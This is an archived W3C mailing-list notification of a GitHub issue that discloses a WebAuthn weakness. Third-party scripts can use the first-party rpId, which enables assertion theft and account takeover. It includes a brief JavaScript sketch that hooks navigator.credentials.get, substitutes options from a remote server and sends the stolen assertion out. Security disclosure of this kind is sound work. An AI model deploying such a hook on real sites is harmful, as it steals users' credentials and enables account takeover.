- From: SMD2 via GitHub <sysbot+gh@w3.org>
- Date: Wed, 11 May 2022 18:50:31 +0000
- To: public-webauthn@w3.org
SMD2 has just created a new issue for https://github.com/w3c/webauthn:
== Missing specification on rpId validation when invoking the API from 3rd party origin ==
3rd party javascript running on a page is able to call Webauthn API using the rpId of the 1st party origin context.
This allows attackers with control over any JS embedded in a page or through browser extension to steal a user's assertion and perform an account takeover attack.
This was proven to be exploitable on all browsers/platforms/authenticators that support Webauthn.
We conducted the attack by wrapping the `navigator.credentials.get` function and extending its functionality to replace the original PublicKeyCredentialRequestOptions with a malicuse one received from a remote server
The implementation looks like this:
```
originalNavCredGet = navigator.credentials.get
navigator.credentials.get = async (challenge) => {
remoteChallenge = await getRemoteChallenge()
assertion = await originalNavCredGet(remoteChallenge)
sendAssertion(assrtion)
};
```
This code is executed from a cross-origin JS resource or content script.
A full working POC code will be released in the future.
Please view or discuss this issue at https://github.com/w3c/webauthn/issues/1731 using your GitHub account
--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Wednesday, 11 May 2022 18:50:32 UTC